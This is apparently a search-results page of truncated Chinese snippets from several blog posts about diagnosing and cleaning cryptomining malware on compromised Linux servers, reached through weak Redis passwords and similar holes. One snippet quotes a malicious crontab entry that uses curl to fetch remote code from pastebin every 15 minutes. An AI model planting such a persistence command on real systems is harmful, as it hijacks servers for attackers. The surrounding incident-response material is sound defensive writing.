首先：又是经典的宝塔cpu100%。 还是先看进程 pstree这次是正常的，没看到异常的进程树 然后 top 发现一个【ext4】 一个中括号的进程占用了99%的cpu 我把这个进程单独看了一下 top -Hp PID 然后按了一下c，出现了这个。 进文件夹看看这又是个啥吧 病毒挖矿 ...

说一说被挖矿事件搞的我想杀人的事！！！！ 2019年9月18日，发现服务器被黑，用亚马逊服务器挖矿。 服务器部署组件：nginx redis mongodb jdk 具体症状如下： 安装mongodb，启动mongodb后，发现mongo命令被莫名的删除，无法进入数据库，php程序报错 ...

服务器被植入挖矿，刚解决完，参考文章！ 上午重启服务的时候，发现程序启动死慢，用top命令查看了一下，cpu被占用接近100%，所以无法运行新程序，通过top命令然后输入P，就能看到有两个程序几乎占用了所有的CPU，占用率为700%左右，程序名称为：minerd和AnXqV两个，通过搜索知道 ...

Linux 服务器上有挖矿病毒处理 分析 今天遇到病毒挖矿，有点小兴奋。 来波分析： 看上面的症状是：攻击者通过docker入侵的【后面了解，可能是redis账号密码简单的原因被爆破的】 最奇诡的事，攻击者可能通过提权，获取到root的权限。然后一些列的挖矿病毒 大致流程图 ...

记录一次解决挖矿病毒的过程（进程：susupdate，networkservice） 目录 1.找出病毒进程 2.根据进程号找到运行文件的位置 3.删除病毒进程 4.删除病毒文件 4.1 文件无法正常删除如何解决？ 5. ...

这几天阿里云云服务器cpu一直跑满，一查发现有个定时任务，在搜索一下，发现自己中毒了，原来前几天搞redis学习的时候设置了个弱密码，被ssh暴力破解植入病毒了。 crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw ...

一般情况下，挖矿病毒都是自动扫描+自动挂马生成的，并不会是有专人进行攻击，所以也比较好清除，注意清除之后需要 check 有无后门。 最重要几点（也可能是被hack的原因）：禁止 ROOT 用户登陆，ROOT 不能使用弱密码，FRP 需要配置，不能使用默认选项。 挖矿进程占用的 CPU 资源 ...

通常情况下挖矿程序攻击后导致CPU飙升至80%以上，阿里云cpu监控占比，或者通过命令查看占比 使用top看看cpu占用率，发现sysupdate或networkservice对服务器CPU大量占用的情况 　　3. 进入proc查看 cd /proc/$PID ...